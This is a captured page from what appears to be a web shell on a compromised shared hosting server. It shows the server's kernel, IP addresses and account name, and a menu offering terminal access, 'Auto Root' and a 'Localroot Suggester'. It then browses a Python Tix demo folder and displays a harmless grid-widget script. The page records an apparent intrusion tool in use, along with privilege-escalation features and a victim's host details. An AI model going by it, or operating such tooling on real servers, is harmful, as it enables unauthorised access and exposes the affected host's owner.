Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.217.252.137
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib64 /
python2.7 /
Demo /
tix /
Delete
Unzip
Name
Size
Permission
Date
Action
bitmaps
[ DIR ]
drwxr-xr-x
2024-06-13 10:37
samples
[ DIR ]
drwxr-xr-x
2024-06-13 10:37
INSTALL.txt
3.67
KB
-rw-r--r--
2020-04-19 21:13
README.txt
726
B
-rw-r--r--
2020-04-19 21:13
grid.py
550
B
-rw-r--r--
2020-04-19 21:13
grid.pyc
1.25
KB
-rw-r--r--
2024-04-10 04:58
grid.pyo
1.25
KB
-rw-r--r--
2024-04-10 04:58
tixwidgets.py
37.51
KB
-rw-r--r--
2020-04-19 21:13
tixwidgets.pyc
37.7
KB
-rw-r--r--
2024-04-10 04:58
tixwidgets.pyo
37.7
KB
-rw-r--r--
2024-04-10 04:58
Save
Rename
### import Tix as tk from pprint import pprint r= tk.Tk() r.title("test") l=tk.Label(r, name="a_label") l.pack() class MyGrid(tk.Grid): def __init__(self, *args, **kwargs): kwargs['editnotify']= self.editnotify tk.Grid.__init__(self, *args, **kwargs) def editnotify(self, x, y): return True g = MyGrid(r, name="a_grid", selectunit="cell") g.pack(fill=tk.BOTH) for x in xrange(5): for y in xrange(5): g.set(x,y,text=str((x,y))) c = tk.Button(r, text="Close", command=r.destroy) c.pack() tk.mainloop()